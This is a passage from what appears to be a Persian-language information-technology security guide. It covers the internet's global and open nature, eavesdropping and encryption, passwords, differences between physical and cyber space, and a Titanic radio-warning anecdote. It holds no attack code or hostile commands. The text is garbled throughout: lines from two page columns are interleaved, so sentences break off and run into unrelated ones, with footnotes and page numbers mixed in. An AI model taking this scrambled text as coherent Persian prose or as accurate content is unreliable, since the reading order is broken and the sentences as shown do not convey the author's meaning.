‫ﻣﻲﺷﻮﺩ‪ .‬ﻗﻴﻤﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﺗﻠﻔـﻦ ﻭ‬ ‫ﺻﺤﺒﺖﻛﺮﺩﻥ ﻳﺎ ﮔﻮﺵﺩﺍﺩﻥ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻛﺎﻓﻲﻧﺖ ﻭ ﺩﻳﮕﺮ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺑﺴﻴﺎﺭ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺟﻬﺎﻧﻲ ﺍﺳﺖ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ‬
‫ﺍﻧﺪﻙ ﺍﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺩﺭﺻـﺪ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺮﺯﻫـﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ‬
‫ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺮﺩﻡ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﻪ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﺟﺮﻳﺎﻥ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻭﻳﮋﮔـﻲ ﺑـﺎﺭﺯﺗﺮﻳﻦ ﻭ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻧﻊ ﻣﻮﺟﻮﺩ ﻣﻴﺎﻥ ﻣﺆﻟﻒ ﻭ ﻧﺎﺷﺮ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻩ ﺍﺳـﺖ؛‬ ‫ﺟﺎﻟﺒﺘﺮﻳﻦ ﺧﺼﻮﺻﻴﺖ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﺍﻟﺒﺘـﻪ ﺍﺭﺗﺒـﺎﻁ ﭼﻨـﺪﺍﻧﻲ ﺑـﻪ‬
‫ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺎﺷـﺮ ﺑﺎﺷـﻴﺪ ﻭ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺧـﺪﻣﺎﺕ‬ ‫ﺍﻣﻨﻴﺖ ﻧﺪﺍﺭﺩ‪ .‬ﺷﺒﻜﺔ ‪ PSTN‬ﻧﻴﺰ ﺟﻬﺎﻧﻲ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺷﺒﻜﻪﺍﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﻨﻬﺎ ﻛﺎﻓﻴـﺴﺖ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ‬ ‫ﺩﺳﺘﺮﺳﻲ ﺗﻠﻔﻨﻲ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﻫﻤﻮﺍﺭﻩ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﺑﺎﺷـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭﺑـﺎﺭﺓ‬ ‫ﻼ ﻛﺎﺭﺑﺮ ﺗﻠﻔﻦ ﻣﻲﺩﺍﻧﺪ ﻛﻪ ﺑـﺎ ﻳـﻚ ﻛـﺸﻮﺭ ﺧـﺎﺭﺟﻲ‬ ‫ﻧﻴﺴﺖ ﻭ ﻣﺜ ﹰ‬
‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴـﺪ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﻛﻨﻴـﺪ ﻭ ﻫـﺮ ﻛـﺲ‬ ‫ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﺍﺳﺖ؛ ﺍﻣﺎ ﻭﻗﺘﻴﻜﻪ ﺑﻪ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺩﺭﺻﻮﺭﺕ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ‬ ‫ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻟﺰﻭﻣـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺪﺍﻧـﺪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺁﻥ ﺩﺭ‬
‫ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪.‬‬
‫‪38‬‬ ‫‪Transmission Control Protocol/Internet‬‬
‫‪Protocol‬‬
‫‪39‬‬ ‫‪Internet Engineering Task Force‬‬
‫‪40‬‬ ‫‪Bandwidth‬‬ ‫‪36‬‬ ‫‪Public Switched Telephone Network‬‬
‫‪41‬‬ ‫‪Wireless Local Area Networks‬‬ ‫‪37‬‬ ‫‪Internet Services‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٦‬‬

‫ﻣﻮﺿﻮﻋﺎﺕ ﻣﻄﺮﺡ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬ ‫ﺟﺎﻧﺐ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺻﻞ ﺷﺪﻩ ﻭ ﺍﺯ ﺁﻥ ﺧـﺪﻣﺎﺕ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻂ ﻛـﺎﺭﺑﺮﺍﻥ ﻗﺎﺑـﻞ ﻛﻨﺘـﺮﻝ ﻭ ﺷـﻨﻮﺩ‬
‫ﻣﻔﺎﻫﻴﻢ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺷﺒﻜﻪ ﻭ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻫﻤﺎﻧﻨـﺪ‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ‬
‫ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻫﺴﺘﻨﺪ‪ ،‬ﻭﻟﻲ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺭﻭﺍﻟﻬـﺎﻱ‬
‫ﻛﻪ ﭘﻴﺎﻣﻬﺎ ﻭ ﺳﺎﻳﺮ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺭﺳـﺎﻟﻴﺘﺎﻥ ﺑـﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﺷـﻨﻮﺩ‬
‫ﻼ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺑﻬﺎﻱ‬‫ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻧﻬﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪ .‬ﻣﺜ ﹰ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻳﺎ ﺧـﺪﻣﺎﺕ ﺭﺍ ﻓـﺮﺍﻫﻢ‬
‫ﻣﻲﺁﻭﺭﻧﺪ‪ ،‬ﺑﻪ ﺟﺎﻱ ﻛﻠﻴـﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﻳـﺎ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،‬ﺩﺍﺭﺍﻱ‬ ‫ﺑﻌﻼﻭﻩ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﻫﺮﭼﻨـﺪ‬
‫ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ‪ ٤٢‬ﻭ ﺭﻣﺰ ﻋﺒـﻮﺭ‪ ٤٣‬ﻫـﺴﺘﻴﻢ ﻭ ﺑﺠـﺎﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬ ‫ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻳﻚ ﻣﻨﺒﻊ ﺧـﺎﺭﺟﻲ ﺩﺭﺧﻮﺍﺳـﺖ ﻛﻨﻴـﺪ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ‬
‫ﭘﺎﻛﺘﻬﺎﻱ ﺩﺭﺑﺴﺘﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺩﺍﺩﺓ ﺍﻧﺘﻘـﺎﻟﻲ‬ ‫ﻼ ﺍﺯ ‪ ISP‬ﺧـﻮﺩ ﺑﺨﻮﺍﻫﻴـﺪ ﻛـﻪ‬ ‫ﺑﺮﺍﻱ ﺷـﻤﺎ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ ‪ -‬ﻣـﺜ ﹰ‬
‫ﺭﺍ ﺑﻪ ﻧﺤﻮﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﻢ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺱ‪ ،‬ﻏﻴﺮﻗﺎﺑﻞ‬ ‫ﭘﻴﺎﻣﻬﺎﻱ ﻧﺎﻣﻄﻠﻮﺏ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺧﻮﺩﺗـﺎﻥ ﺗـﺪﻭﻳﻦ‬
‫ﺧﻮﺍﻧﺪﻥ ﺑﺎﺷﺪ‪.‬‬ ‫ﻣﻲﻛﻨﻴﺪ ﻏﺮﺑﺎﻝ ﻧﻤﺎﻳﺪ‪.‬‬

‫ﺩﺭ ﻣﻘﺎﻳﺴﺔ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺎ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗـﻮﺍﻧﻴﻢ ﺗﺨﻠﻔـﺎﺕ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺭﺳﺎﻧﺔ ﺗﻌﺎﻣﻠﻲ ﺍﺳﺖ؛ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﻭ ﺑـﺎ‬
‫ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺑﺒﻴﻨـﻴﻢ‪ .‬ﺩﺭ‬ ‫ﺳﺮﻋﺖ ﭼﻨﺪﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ‪ ،‬ﻳﺎ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺴﻴﺎﺭﻱ‬
‫ﻫﺮ ﺩﻭﻱ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺩﺭﺳﻬﺎﻱ ﻧﺎﺩﺭﺳﺖ ﻭ ﻳـﺎ ﺍﻣـﻀﺎﻫﺎﻱ‬ ‫ﭘﻴﺎﻣﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻭ ﻳﺎ ﺑﻪ ﺁﻧﻬﺎ ﭘﻴﺎﻡ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﺯ‬
‫ﺟﻌﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﻫﺮ ﺩﻭ ﻓﻀﺎ ﺍﻣﻜﺎﻥ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﺁﻧﺠﺎ ﻛﻪ ﺯﻣﺎﻥ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺑـﺮﺧﻂ ﺑـﺴﺘﮕﻲ ﺑـﻪ ﻣﻴـﺰﺍﻥ‬
‫ﻏﻠﻂ ﻳﺎ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﻧﻴﺰ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺍﻣﻜـﺎﻥ‬ ‫ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺧﻂ ﺍﺭﺗﺒﺎﻃﻲ ﺷﻤﺎ ﺩﺍﺭﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﻳﺎﻓﺖ ﭘﺎﺳـﺦ‬
‫ﺑـﻪ ﺍﺷـﺘﺒﺎﻩ ﺍﻧــﺪﺍﺧﺘﻦ ﺍﺷــﺨﺎﺹ ﺑـﺎ ﺍﻃﻼﻋــﺎﺕ ‪ -‬ﭼــﻪ ﺑــﺼﻮﺭﺕ‬ ‫ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻛﻤﻲ ﻃﻮﻝ ﺑﻜﺸﺪ‪.‬‬
‫ﺗﺼﺎﺩﻓﻲ ﻭ ﭼﻪ ﺍﺯ ﺭﻭﻱ ﻋﻤﺪ ‪ -‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺳﺎﺱ ﺁﻥ ﺑﺮ‬
‫ﻧﺘــﻮﺍﻥ ﺗﻌﻴــﻴﻦ ﻛــﺮﺩ ﻛــﻪ ﭼــﻪ ﺍﻃﻼﻋــﺎﺗﻲ ﻣﻬــﻢ ﻭ ﻗﺎﺑــﻞ ﺗﺄﻳﻴــﺪ‬ ‫ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﻫﻤﻜﺎﺭ ﻭ ﻧﺴﺒﺘﹰﺎ ﻣـﺸﺎﺑﻪ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ‬
‫ﻫﺴﺘﻨﺪ‪ ٤٤.‬ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺩﺭ ﻫـﺮ ﺩﻭ ﻓـﻀﺎ ﺍﻣﻜـﺎﻥ ﺩﺳﺘﺮﺳـﻲ‬ ‫ﺩﺍﺷﺖ ﻭ ﺑﺠﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻄﻤﺌﻦ‪،‬‬
‫ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺻـﺪ‬ ‫ﺩﺭ ﺁﻥ ﺑﻪ ﻫﻤﻪ ﺍﻋﺘﻤﺎﺩ ﻣـﻲﺷـﺪ‪ .‬ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬ ‫ﺍﻳﻨﺘﺮﻧــﺖ ﺭﺍ ﺑــﻪ ﺷــﻤﺎ ﺷﻨﺎﺳــﺎﻧﺪﻩ ﻭ ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫــﺎﻱ‬
‫ﺍﻣﺎ ﺑﺎ ﻫﻤﺔ ﺍﻳﻦ ﺷﺒﺎﻫﺘﻬﺎ ﺳﻪ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ ﻣﻴـﺎﻥ ﺍﻳـﻦ ﺩﻭ ﻓـﻀﺎ‬ ‫ﺳــﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺘــﻲ ﺭﺍ ﺑــﺮﺍﻱ ﻛﻤــﻚ ﺑــﻪ ﺷــﻤﺎ ﺩﺭ ﻛــﺎﻫﺶ‬
‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﺩ‪:‬‬ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬

‫ﺍﻭﻝ‪ :‬ﻫﺮ ﻧﻮﻉ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ‬ ‫ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺨـﺼﻪﻫـﺎﻱ ﻓـﻮﻕ ﺗـﺎﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺫﻫـﻦ ﺧـﻮﺩ‬
‫ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘﺪ؛ ﻳﻌﻨﻲ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺁﮔـﺎﻩ ﺷـﻮﻳﺪ ﭼـﻪ‬ ‫ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫـﺮ ﻧـﻮﻉ ﻓﻌﺎﻟﻴـﺖ‬
‫ﺍﺗﻔﺎﻗﻲ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺷﻤﺎ ﺍﻓﺘﺎﺩﻩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻳﮕﺮ ﺑـﺮﺍﻱ‬ ‫ﻣﺠﺎﺯ ﺍﺳﺖ ﻭ ﭼﻴﺰﻱ ﺩﺭ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺖ ﻧـﺪﺍﺭﺩ ﻭ ﺗﺤـﺖ ﻛﻨﺘـﺮﻝ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧﺴﺎﺭﺕ ﺑﺴﻴﺎﺭ ﺩﻳـﺮ ﺷـﺪﻩ ﺑﺎﺷـﺪ‪ .‬ﺍﻟﺒﺘـﻪ‬ ‫ﻧﻴــﺴﺖ‪ .‬ﺍﻳــﻦ ﻓــﻀﺎﻱ ﺑــﺎﺯ ﺑﺨــﻮﺑﻲ ﺭﻳــﺸﻪﻫــﺎﻱ ﭘﮋﻭﻫــﺸﻲ ﻭ‬
‫ﺗﻤﺎﻣﻲ ﺣﻤﻼﺕ ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﻧﻤﻲﺍﻓﺘﻨﺪ؛ ﺑﻠﻜﻪ ﺑﻌـﻀﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺭ‬ ‫ﺩﺍﻧﺸﮕﺎﻫﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻭ ﻓﻮﺍﻳﺪ ﺁﻧﺮﺍ ﺑـﺮﺍﻱ ﺗﻤـﺎﻣﻲ‬
‫ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪﻩﺍﻧﺪ ﻭ ﺑﺮﺍﻱ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻥ ﺯﻣـﺎﻥ‬ ‫ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﻣﻲ ﻧﻤﺎﻳﺎﻧﺪ‪ .‬ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺎ ﻫـﺪﻑ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ‬
‫ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ‪ ،‬ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺛﻤﺮﺍﺕ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻣـﺸﺘﺮﻙ‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﻴـﺰﺍﻥ ﺁﺯﺍﺩﻱ ﻋﻤـﻞ ﻓﺮﺻـﺘﻬﺎﻳﻲ ﺑـﺮﺍﻱ‬
‫‪42‬‬ ‫‪Username‬‬
‫‪43‬‬ ‫‪Password‬‬ ‫ﺍﻓﺮﺍﺩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺷﺒﻜﻪﻫﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻭ‬
‫ﻛﺎﭘﻴﺘﺎﻥ ﻛﺸﺘﻲ ﻣﻌﺮﻭﻑ ﺗﺎﻳﺘﺎﻧﻴـﻚ ﺍﺯ ﺭﺍﺩﻳـﻮﻱ ﺍﻭﻟﻴـﻪ ﺑـﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ‬ ‫‪۴۴‬‬
‫ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺁﺳﻴﺒﻬﺎﻱ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻣﺎ ﺍﺑﺘـﺪﺍ ﺑﺎﻳـﺪ ﻣﺎﻫﻴـﺖ‬
‫ﺗﻤﺎﺱ ﺍﺯ ﻛﺸﺘﻲ ﺑﺎ ﺳﺎﺣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ‪ .‬ﻣﻨﺸﻲ ﺭﺍﺩﻳﻮ ﻛﻪ ﺍﻭﻟﻴﻦ ﺳﻔﺮ‬
‫ﺩﺭﻳﺎﻳﻲ ﺧﻮﺩ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻣـﻲﻛـﺮﺩ ﺁﻧﻘـﺪﺭ ﭘﻴﺎﻣﻬـﺎﻱ ﺷﺨـﺼﻲ ﺩﺭﻳﺎﻓـﺖ‬ ‫ﺍﻳﻦ ﻧﻮﻉ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺷﺒﻜﻪﻫﺎﻱ ﺧﻮﺩ‬
‫ﻣﻲﻧﻤﻮﺩ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ‪ -‬ﻫﺸﺪﺍﺭ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻛﻮﻩ ﻳﺨـﻲ ﺑـﺰﺭﮒ‬ ‫ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺍﻣﻦ ﻛﻨﻴﻢ‪.‬‬
‫ﺩﺭ ﻣﺴﻴﺮ ﺣﺮﻛﺖ ﻛﺸﺘﻲ ‪ -‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ﻭ ﺷﺎﻳـﺴﺘﺔ ﭘﻴﮕﻴـﺮﻱ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻧﺸﺪ‪ .‬ﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻛﺸﺘﻲ ﺑﺎ ﻛﻮﻩ ﻳﺨﻲ ﺑﺮﺧﻮﺭﺩ ﻛـﺮﺩ ﻭ‬
‫ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻌﺪ ﻏﺮﻕ ﺷﺪ‪.‬‬
‫‪٣٧‬‬ ‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬

‫ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩﺍﻱ ﭼﻮﻥ ﻟﻐﻮ ﭘﺮﻭﺍﺯﻫﺎﻱ ﻫﻮﺍﻳﻲ‪ ،‬ﺍﺧﺘﻼﻝ ﺩﺭ‬ ‫ﺯﻳﺎﺩﻱ ﻣﻲﺑﺮﻧﺪ‪ .‬ﺩﺭﺳﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻣﻄﻠـﺐ ﮔﺮﻓﺘـﻪ ﻣـﻲﺷـﻮﺩ ﺁﻥ‬
‫ﺍﻧﺘﺨﺎﺑﺎﺕ‪ ،‬ﻭ ﺑﺮﻭﺯ ﺍﺷﻜﺎﻝ ﺩﺭ ﻛﺎﺭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ‬ ‫ﺍﺳﺖ ﻛﻪ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻭ ﺑﺎﺯﺩﺍﺭﻧﺪﻩ ﺑﺎﻳﺪ ﺍﺯ ﺍﺳﺘﻴﻼﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ‬
‫ﺑﺨﺶ ﺍﻭﻝ‬

‫‪٥٠‬‬
‫ﺷﺪ‪.‬‬ ‫ﺗﺸﺨﻴﺺ ﻧﻘﺾ ﺣﺮﻳﻢ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻴﻦ ﻭﻗﻮﻉ ﺟﺮﻡ ﻳﺎ ﭘﺲ ﺍﺯ ﺁﻥ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺩﻭﻡ‪ :‬ﻻﺯﻡ ﻧﻴﺴﺖ ﺷﻤﺎ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺣـﻀﻮﺭ‬
